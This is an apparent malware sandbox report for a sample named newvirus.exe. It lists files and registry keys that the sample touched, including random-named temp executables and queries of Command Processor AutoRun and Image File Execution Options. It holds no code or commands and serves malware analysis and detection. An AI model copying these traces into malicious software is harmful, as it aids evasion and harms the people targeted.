C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\Microsoft.Net\assembly\GAC_32\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\48b6b6a0ed8f6b51ebb5422f123f8882\System.ServiceProcess.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\48b6b6a0ed8f6b51ebb5422f123f8882\System.ServiceProcess.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\Z4uWTtWlkt.dll C:\Users\Seven01\AppData\Local\Temp\Z4uWTtWlkt\Z4uWTtWlkt.dll C:\Users\Seven01\AppData\Local\Temp\Z4uWTtWlkt.exe C:\Users\Seven01\AppData\Local\Temp\Z4uWTtWlkt\Z4uWTtWlkt.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources\dyQ6aw6zBFOarLH+PJiSauTqDecP0AqDEo8oHmuFTFjDxkU7.resources.exe C:\Users\Seven01\AppData\Local\Temp\newvirus.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\bcrypt.dll C:\Users\Seven01\AppData\Local\Temp\secgdcpIy.dll C:\Users\Seven01\AppData\Local\Temp\secgdcpIy\secgdcpIy.dll C:\Users\Seven01\AppData\Local\Temp\secgdcpIy.exe C:\Users\Seven01\AppData\Local\Temp\secgdcpIy\secgdcpIy.exe C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Users\Seven01\AppData\Local\Temp\newvirus.exe:Zone.Identifier nul \??\nul C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\newvirus.exe.config C:\Users\Seven01\AppData\Local\Temp\newvirus.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c1ad6bd64a23a5d912f171480ee2f9a2\System.Management.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\48b6b6a0ed8f6b51ebb5422f123f8882\System.ServiceProcess.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\48b6b6a0ed8f6b51ebb5422f123f8882\System.ServiceProcess.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll \??\nul C:\Windows\SysWOW64\ntdll.dll
Write Files
C:\Users\Seven01\AppData\Local\Temp\newvirus.exe:Zone.Identifier
Delete Files
Nothing to display
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\newvirus.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web.Extensions__31bf3856ad364e35 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web.Extensions__31bf3856ad364e35 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\newvirus.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\8BAA8F7F HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|newvirus.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|newvirus.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|newvirus.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_CURRENT_USER\ HKEY_CURRENT_USER\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
Read Keys
